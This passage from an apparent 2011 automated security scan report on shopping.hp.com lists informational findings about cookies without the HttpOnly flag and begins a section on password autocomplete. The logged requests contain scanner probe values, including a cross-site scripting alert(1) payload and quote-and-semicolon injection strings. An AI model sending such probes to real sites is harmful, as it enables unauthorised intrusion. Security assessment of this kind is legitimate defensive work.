s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fseries_can.do%25253FstoreName%25253Dcomputer_store%252526landing%25253Ddesktops%252526a1%25253DCategory%252526v1%25253DAll-in-One%25252BPCs%252526jumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Fdesktops%25252FAll-in-One_PCs%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fproduct_advisor.do%25253Flanding%25253Ddesktops%252526storeName%25253Dcomputer_st%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 166238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html lang="en">
<head>
<style ty
...[SNIP]...

4.73. http://www.shopping.hp.com/webapp/shopping/product_comparison.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktops&category=p7xt_series&lanAttr=&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:28:53 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:28:54 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284317


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...

4.74. http://www.shopping.hp.com/webapp/shopping/product_detail.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:47 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=qJLfT6LXLYvgcqqLnkGNhMTmz0mT0SmVfp197Ly3QVFjGKSpllSy!-1039217636; expires=Friday, 23-Sep-2011 01:10:47 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:47 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:47 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224370

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...

4.75. http://www.shopping.hp.com/webapp/shopping/search_request.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/search_request.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/search_request.do;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?searchType=keyword&inkTonerSearchQuery=&pageName=home&Printer_Search_Query=&Cartridge_Search_Query=&printerOrCartridgeSearch=&locationOfSearchQuery=&returnUrlQueryString=&searchQuery=xss+printer HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlkviNuV2Qh%2FMS3uvFPdcQKd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=6; s_var_20=in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Aprinters%20%26%20all-in-ones; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x5x34; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Ahome%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:05 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksi9Ge2gh4NinvvVvZdgWa0ic%3D&s1=xss+printer; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hpcomsh_usen=s1=xss+printer&s1_context=hhostore&s2_context=hpcomsearch&s2=xss; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hho_omni_usen=window.hpmetrics.isearch%3D%7B%27search_term%27%3A%27xss+printer%27%2C%27search_referrer%27%3A%27home%27%2C%27searchtype%27%3A%27search_noresults_keyword%27%2C%27sort%27%3A%27most_popular%27%2C%27numrecords%27%3A0%2C%27numchosen%27%3A0%2C%27resultset%27%3A0%2C%27refinepath%27%3A%27%27%2C%27correct%27%3A0%2C%27suggest%27%3A%27%27%2C%27search_platform%27%3A%27EA%27%2C%27searchresultpage%27%3Atrue%2C%27searchrefine%27%3Afalse%7D; domain=.hp.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1867


<html>
<body>

<!-- SiteCatalyst code version: F.3.
Copyright 2006 Omniture, Inc. More info available at
http://www.omniture.com Testing -->
<s
...[SNIP]...

4.76. http://www.shopping.hp.com/webapp/shopping/series_can.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/series_can.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One+PCs&jumpid=in_R329_prodexp/hhoslp/psg/desktops/All-in-One_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=23; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Anotebook%3Alaptops%20and%20mini%20pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11159; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Acs%25253Adesktops%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fseries_can.do_storeName%25253Dcomputer_store%252526landing%25253Ddesktops%252526a1%25253DCategory%252526v1%25253DAll-in-On_5%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:49 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:50 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 168108


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4.77. http://www.shopping.hp.com/webapp/shopping/store_access.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; HP_EBUS_HP_CLICKS=4x12x2345; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:00:03 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjg92V0Q14NS%2FivlvfcASe0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 241316


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

5. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. http://www.backcountry.com/store/user.html  previous  next

Summary

